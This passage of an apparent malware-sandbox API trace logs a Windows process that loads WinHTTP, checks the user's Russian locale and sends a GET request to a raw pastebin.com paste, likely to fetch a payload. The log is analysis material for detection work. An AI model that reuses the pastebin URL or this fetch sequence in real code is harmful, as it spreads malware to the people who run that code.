"NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xa0\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1119 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler" } ], "repeated": 0, "id": 1120 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1121 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x0000036e" }, { "name": "ObjectAttributesName", "value": "InprocHandler" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler" } ], "repeated": 0, "id": 1122 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 1123 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x1400824ff", "parentcaller": "0x140089aa8", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\winhttpcom" }, { "name": "DllBase", "value": "0x7ffed5f30000" } ], "repeated": 0, "id": 1124 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x1400824ff", "parentcaller": "0x140089aa8", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\winhttpcom.dll" }, { "name": "BaseAddress", "value": "0x7ffed5f30000" } ], "repeated": 0, "id": 1125 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x1400824ff", "parentcaller": "0x140089aa8", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "2087C2F4-2CEF-4953-A8AB-66779B670495" }, { "name": "ClsContext", "value": "0x00000015", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER" }, { "name": "riid", "value": "00020400-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "WinHttp.WinHttpRequest.5.1" } ], "repeated": 0, "id": 1126 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5f49000" }, { "name": "ModuleName", "value": "winhttpcom.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1127 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5f49000" }, { "name": "ModuleName", "value": "winhttpcom.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1128 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 3, "id": 1129 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 1130 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "WINHTTP.dll" } ], "repeated": 0, "id": 1131 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\winhttp.dll" } ], "repeated": 0, "id": 1132 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000370" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\winhttp.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1133 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000388" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000370" }, { "name": "FileName", "value": "C:\\Windows\\System32\\winhttp.dll" } ], "repeated": 0, "id": 1134 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000388" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8a20000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0010a000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1135 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1136 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8af5000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1137 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000388" } ], "repeated": 0, "id": 1138 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000370" } ], "repeated": 0, "id": 1139 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8af5000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1140 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\WINHTTP" }, { "name": "DllBase", "value": "0x7ffed8a20000" } ], "repeated": 0, "id": 1141 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 9, "id": 1142 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "misc", "api": "NtQuerySystemInformation", "status": true, "return": "0x00000000", "arguments": [ { "name": "SystemInformationClass", "value": "0", "pretty_value": "FILE_SUPERSEDE" } ], "repeated": 0, "id": 1143 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "misc", "api": "NtQuerySystemInformation", "status": true, "return": "0x00000000", "arguments": [ { "name": "SystemInformationClass", "value": "1", "pretty_value": "FILE_OPEN" } ], "repeated": 0, "id": 1144 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\winhttp" }, { "name": "BaseAddress", "value": "0x7ffed8a20000" }, { "name": "InitRoutine", "value": "0x7ffed8a6e130" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 1145 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5f49000" }, { "name": "ModuleName", "value": "winhttpcom.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1146 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed5f49000" }, { "name": "ModuleName", "value": "winhttpcom.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1147 }, { "timestamp": "2025-11-20 10:58:33,984", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "winhttp.dll" }, { "name": "BaseAddress", "value": "0x7ffed8a20000" } ], "repeated": 0, "id": 1148 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" }, { "name": "DllBase", "value": "0x7ffecb2e0000" } ], "repeated": 0, "id": 1149 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll" }, { "name": "BaseAddress", "value": "0x7ffecb2e0000" } ], "repeated": 0, "id": 1150 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\system32\\OnDemandConnRouteHelper" }, { "name": "DllBase", "value": "0x7ffecb2e0000" } ], "repeated": 0, "id": 1151 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "3408", "caller": "0x7ffed8a7c1c1", "parentcaller": "0x7ffed8a7c28f", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000003b8" }, { "name": "SubKey", "value": "TenantRestrictions\\Payload" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x00000010", "pretty_value": "KEY_NOTIFY" }, { "name": "Handle", "value": "0x000003c8" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1152 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "3408", "caller": "0x7ffed8a7c3f0", "parentcaller": "0x7ffed8a7c331", "category": "registry", "api": "RegNotifyChangeKeyValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload\\" }, { "name": "NotifyFilter", "value": "0x10000004" }, { "name": "WatchSubtree", "value": "1" }, { "name": "Asynchronous", "value": "1" } ], "repeated": 0, "id": 1153 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00963700" }, { "name": "Option", "value": "0x00000044" }, { "name": "Buffer", "value": "\\xe9\\xfd\\x00\\x00" } ], "repeated": 0, "id": 1154 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00963700" }, { "name": "Option", "value": "0x00000058" }, { "name": "Buffer", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1155 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00963700" }, { "name": "Option", "value": "0x00000053" }, { "name": "Buffer", "value": "\\x00\\x00\\x00 " } ], "repeated": 0, "id": 1156 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "3408", "caller": "0x7ffed8a7c1c1", "parentcaller": "0x7ffed8a7c791", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload" }, { "name": "Class", "value": "" }, { "name": "Access", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "Handle", "value": "0x000003d0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\TenantRestrictions\\Payload" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1157 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "3408", "caller": "0x7ffed8a7c7eb", "parentcaller": "0x7ffed8a7b569", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003d0" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "0" }, { "name": "MaxValueNameLength", "value": "0" }, { "name": "MaxValueLength", "value": "0" } ], "repeated": 0, "id": 1158 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "3408", "caller": "0x7ffed8a7c832", "parentcaller": "0x7ffed8a7b569", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003d0" } ], "repeated": 0, "id": 1159 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpConnect", "status": true, "return": "0x00976830", "arguments": [ { "name": "SessionHandle", "value": "0x00963700" }, { "name": "ServerName", "value": "pastebin.com" }, { "name": "ServerPort", "value": "443" } ], "repeated": 0, "id": 1160 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpOpenRequest", "status": true, "return": "0x009769d0", "arguments": [ { "name": "InternetHandle", "value": "0x00976830" }, { "name": "Verb", "value": "GET" }, { "name": "ObjectName", "value": "/raw/04TKQkE1" }, { "name": "Version", "value": "HTTP/1.1" }, { "name": "Referrer", "value": "" }, { "name": "Flags", "value": "0x00800080" } ], "repeated": 0, "id": 1161 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" }, { "name": "Option", "value": "0x0000004d" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1162 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" }, { "name": "Option", "value": "0x00000059" }, { "name": "Buffer", "value": "\n\\x00\\x00\\x00" } ], "repeated": 0, "id": 1163 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" }, { "name": "Option", "value": "0x0000005b" }, { "name": "Buffer", "value": "\\x00\\x00\\x01\\x00" } ], "repeated": 0, "id": 1164 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "network", "api": "WinHttpSetOption", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x009769d0" }, { "name": "Option", "value": "0x0000005c" }, { "name": "Buffer", "value": "\\x00\\xa0\\x0f\\x00" } ], "repeated": 0, "id": 1165 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\webio" }, { "name": "DllBase", "value": "0x7ffec7790000" } ], "repeated": 0, "id": 1166 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\mswsock" }, { "name": "DllBase", "value": "0x7ffee0260000" } ], "repeated": 0, "id": 1167 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1168 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\mswsock.dll" }, { "name": "BaseAddress", "value": "0x7ffee0260000" } ], "repeated": 0, "id": 1169 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\IPHLPAPI" }, { "name": "DllBase", "value": "0x7ffedff50000" } ], "repeated": 0, "id": 1170 }, { "timestamp": "2025-11-20 10:58:34,000", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 1171 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1172 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\NSI" }, { "name": "DllBase", "value": "0x7ffee2110000" } ], "repeated": 0, "id": 1173 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "2188", "caller": "0x140084a74", "parentcaller": "0x1400a8304", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\WINNSI" }, { "name": "DllBase", "value": "0x7ffedae00000" } ], "repeated": 0, "id": 1174 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b3f7a", "parentcaller": "0x7ffee3350ed7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1175 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1176 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffed8b20000" }, { "name": "ModuleName", "value": "WINHTTP.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1177 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffed8a5ff36", "parentcaller": "0x7ffed8a5fde9", "category": "services", "api": "OpenSCManagerW", "status": true, "return": "0x0098ce90", "arguments": [ { "name": "MachineName", "value": "" }, { "name": "DatabaseName", "value": "" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "SC_MANAGER_CONNECT" } ], "repeated": 0, "id": 1178 }, { "timestamp": "2025-11-20 10:58:34,016", "thread_id": "3408", "caller": "0x7ffed8a5ff5e", "parentcaller": "0x7ffed8a5fde9", "category": "services", "api": "OpenServiceW", "status": true, "return": "0x0098d160", "arguments": [ { "name": "ServiceControlManager", "value": "0x0098ce90" }, { "name": "ServiceName", "value": "WinHttpAutoProxySvc" }, { "name": "DesiredAccess", "value": "0x00000094", "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" } ], "repeated": 0, "id": 1179 }, { "timestamp": "2025-11-20 